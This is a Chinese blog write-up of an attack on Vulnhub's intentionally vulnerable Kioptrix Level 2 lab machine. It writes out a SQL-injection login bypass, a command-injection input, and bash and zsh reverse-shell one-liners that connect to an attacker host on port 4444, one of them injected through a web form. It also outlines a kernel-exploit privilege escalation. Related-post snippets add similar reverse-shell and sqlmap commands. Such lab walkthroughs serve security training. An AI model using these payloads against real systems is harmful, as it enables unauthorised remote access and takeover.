Vulnhub靶机Kioptrix Level 2 writeup

最新推荐文章于 2024-07-19 07:54:07 发布
最新推荐文章于 2024-07-19 07:54:07 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: vulnhub靶机 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xingjinhao123/article/details/122399415
版权

下载地址

https://www.vulnhub.com/entry/kioptrix-level-11-2,23
在这里插入图片描述

信息搜集

扫描IP地址

在这里插入图片描述

扫描端口

在这里插入图片描述

80端口

在这里插入图片描述

万能密码登录

用户名:admin’or ‘1’ = '1 --+ 密码随便写
在这里插入图片描述
登录成功
在这里插入图片描述

命令执行漏洞

输入127.0.0.1 | ls 成功执行命令
在这里插入图片描述
在这里插入图片描述

反弹shell

使用bash反弹shell
bash -c 'exec bash -i &>/dev/tcp/192.168.1.140/4444 <&1'
使用zsh反弹shell
zsh -c 'zmodload zsh/net/tcp && ztcp 192.168.1.140 4444 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'

kali 开启监听
在这里插入图片描述
浏览器输入:127.0.0.1 | bash -c ‘exec bash -i &>/dev/tcp/192.168.1.140/4444 <&1’

成功拿到shell
在这里插入图片描述

提权

查看内核版本
在这里插入图片描述
搜索exp
在这里插入图片描述
将exp上传到靶机
在这里插入图片描述
编译exp,执行exp,成功提权到root
在这里插入图片描述
本文所有用到的工具都可以关注微信公众号“网络安全学习爱好者”联系公众客服免费领取!
在这里插入图片描述

Sword-豪
关注
专栏目录
Kioptrix Level 2 靶机wp
m0_52496313的博客
08-12 875
Kioptrix Level 2靶机wp
KIOPTRIX: LEVEL 1.1-VulnHub靶机学习第三篇
qq_27466929的博客
08-25 901
VulnHub靶机学习第三篇:KIOPTRIX: LEVEL 1.1
VulnHub——Kioptrix Level 2
江左盟的博客
04-21 1220
简介 信息收集 使用fping -agq 192.168.0.0/24探测局域网内其它主机,发现目标主机IP地址,如图: 然后使用nmap --min-rate 10000 -T5 -A -sC -p1-65535 192.168.0.129快速扫描目标主机开启的端口与服务,发现开启22,80,111,443,631,660和3306端口, 使用SearchSploit搜...
渗透测试靶机---Kioptrix Level 2
最新发布
久恙502的博客
07-19 252
渗透测试,打靶经历记录,大佬多多指点,谢谢!!
Vulnhub系列:Kioptrix Level 2
Fuzz
07-31 293
简介 Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台。 个人学习目的:1,方便学习更多类型漏洞。2,为0SCP做打基础。 下载链接 运行环境 kali:192.168.44.128 Vulnhub靶机:192.168.44.133 相关知识点 0x00、信息收集 主机发现 :nmap -sP 192.168.44.0/24 端口扫描:nmap -sS -sV -T5 -p- 192.168.44.133 0x01、Web 发现 ...
vulnhubKioptrix Level 2
li1136594919的博客
06-09 452
靶机的默认网络方式为桥接,而且改为NAT模式后会自动更改,grud模式也进不去,来来回回折腾了两个小时,都还没搞定IP分配的问题,一度想要删掉靶机
vulnhub靶机-DC2-Writeup
liuhanzhe的专栏
12-08 645
0x01 部署 靶机地址: https://www.vulnhub.com/entry/dc-2,311/ DESCRIPTION Much like DC-1, DC-2 is another purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. As with the original DC-1, it’s designed with begi
KIOPTRIX: LEVEL 1-VulnHub靶机学习第二篇
qq_27466929的博客
08-23 552
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1
vulnhub靶机-DC1-Writeup
liuhanzhe的专栏
12-08 1181
vulnhub靶机-DC1-writeup
Vulnhub靶机 Kioptrix: Level 2
菜浪马废的博客
04-08 305
靶机,扫端口 没有验证机制 看的我都想暴力破解了 万能密码试一下 可以绕过 admin‘ or ’1‘=’1 抓包,这个样子 命令执行 192.168.0.128;bash -i >& /dev/tcp/192.168.0.128/4444 0>&1& nmap -lnvp 4444 linux内核2.6.9 ...
Vulnhub系列-Kioptrix-Level-2
Yasso的博客
12-18 612
靶机: 192.168.249.130 kali: 192.168.249.129 一、信息收集 arp-scan -l nmap -sV 192.168.249.130—查看开放端口 ----访问下80端口---- 发现是个登录框先试试万能密码 username:admin' or 1=1# password:123(任意密码) 发现可以登陆,即存在sql注入 二、0x00漏洞利用(sql注入) sqlmap跑一下数据 登陆框抓包,因为sql注入在username处,在username处标记(减少测试时
Kioptrix Level 2
cxyzupup的博客
01-10 2096
Kioptrix Level 2 项目地址:https://www.vulnhub.com/entry/kioptrix-level-11-2,23/ 提示:靶机网络连接方式使用NAT模式。 文章目录Kioptrix Level 2一、信息收集:1.使用fping工具查找靶机IP:2.使用nmap对目标主机端口进行枚举:二、信息利用:1. 访问http和https服务查看源码并未发现有用信息,因此直接枚举web服务:2. nmap枚举到了该系统使用了mysql,因此可以使用sqlmap进行注入探测3. 使用
Kioptrix Level 2入门级详细教程&小白也能看懂!
jockerboss的博客
02-27 1065
Kioptrix Level 2入门级教程&小白也能看懂!简单易懂
黑客零基础第三章-Web漏洞利用实战-命令注入Kioptrix Level 2
ShadowBlade
08-16 2590
第三节内容讲述了Web命令注入漏洞和原理,并在DVWA上体验了一把入侵。本节以实战的方式,结合vulnhub靶机Kioptrix Level 2让大家体会命令注入的真实入侵。这个靶机会涉及到一点SQL注入的知识,但易于理解。后续章节会给大家着重讲解SQL注入。 如果靶机部署有疑问,请留言! 1.信息收集 kali IP为192.168.17.4 发现靶机IP192.168.17.5 使用第二章nmap命令扫描靶机, nmap -p `nmap -p- --min-rate=10000 ..
Kioptrix: Level 2靶机实战 sql注入万能密码到后台 命令执行;getshell 内核漏洞9542 提权
YouthBelief的博客
11-24 1307
Kioptrix: Level 1靶机实战前言0x01 信息收集1.1 探测靶机ip1.2 nmap探测端口0x02 漏洞探测2.1 访问首页 80端口2.1.1远程系统管理员登录界面2.1.1.1 尝试万能密码2.1.1.2 sqlmap2.1.2 命令执行漏洞利用0x03提权3.1查看当前权限3.2内核漏洞提权3.2.1 查看操作系统版本和内核版本3.2.2 找版本漏洞3.2.3上传到靶机中3.2.4 编译运行0x04 总结 前言 Kioptrix: Level 2 (#1): 靶机地址 https:
【Oscp备考-Kioptrix2】
weixin_44126257的博客
09-16 2018
Oscp备考:Kioptrix Level 2
Kioptrix Level2
底层社会中的弱智
04-16 905
目标IP:192.168.11.176 端口开放情况: 先从80端口入手 使用抓包--爆破 暂不使用 测试注入 目录扫描 使用post传值,我们抓包后放到sqlmap中测试 添加*号优先测试 sqlmap -r q.txt --level 5 --risk 3 逐步跑出用户名和密码 sqlmap -r q.txt --level 5 --risk 3 -...
vulnhub靶机——raven: 2
09-03
- *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sword-豪

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值